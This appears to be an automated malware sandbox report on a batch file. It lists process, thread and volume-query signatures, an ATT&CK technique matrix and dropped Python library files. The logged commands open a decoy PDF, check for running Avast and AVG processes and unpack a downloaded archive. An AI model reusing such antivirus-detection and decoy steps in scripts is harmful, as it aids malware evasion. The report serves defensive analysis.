Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 6055	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5321	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4497	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5152
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4592

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep count: 5321 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep count: 4497 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7232	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7672	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520	Thread sleep count: 5152 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520	Thread sleep count: 4592 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep time: -11990383647911201s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: 3.8.html.17.dr	Binary or memory string: for better performance. On Windows Subsystem for Linux and QEMU User
Source: svchost.exe, 0000000A.00000002.3027052139.000001EF0DA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3029346106.000001EF13255000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000008.00000002.2435985047.0000025749990000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation

Source: find.exe, 00000007.00000002.1781567662.000001C15509B000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000007.00000002.1781657909.000001C1551D4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: avgui.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	11 Process Injection	11 Masquerading	OS Credential Dumping	21 Security Software Discovery	1 Taint Shared Content	Data from Local System	Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
new.bat	8%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_aix_support.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_collections_abc.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_compression.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_markupbase.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_osx_support.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_py_abc.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_pydatetime.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_pyio.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_pylong.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_sitebuiltins.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_strptime.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_threading_local.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_weakrefset.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\abc.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\aifc.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\argparse.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ast.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\__init__.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\__main__.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\base_events.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\base_futures.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\base_subprocess.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\base_tasks.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\events.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\exceptions.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\format_helpers.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\futures.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\locks.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\log.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\mixins.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\proactor_events.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\protocols.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\queues.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\runners.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\selector_events.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\sslproto.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\staggered.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\streams.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\subprocess.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\taskgroups.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\tasks.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\threads.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\timeouts.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\transports.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\trsock.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\unix_events.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\windows_events.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\windows_utils.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\base64.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\bdb.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\bisect.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\bz2.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\cProfile.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\calendar.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\cgi.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\cgitb.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\chunk.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\cmd.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\code.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\codecs.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\collections\__init__.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\collections\abc.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\colorsys.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\compileall.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\concurrent\futures\__init__.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\concurrent\futures\_base.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\concurrent\futures\process.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\concurrent\futures\thread.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\configparser.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\contextlib.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\contextvars.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\copy.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\copyreg.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\crypt.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\csv.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\__init__.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\_aix.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\_endian.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\macholib\__init__.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\macholib\dyld.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\macholib\dylib.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\macholib\fetch_macholib	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\macholib\framework.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\util.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\curses\__init__.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\curses\ascii.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\curses\panel.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\curses\textpad.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dataclasses.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dbm\__init__.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dbm\dumb.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dbm\gnu.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dbm\ndbm.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\difflib.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dis.py	0%	ReversingLabs
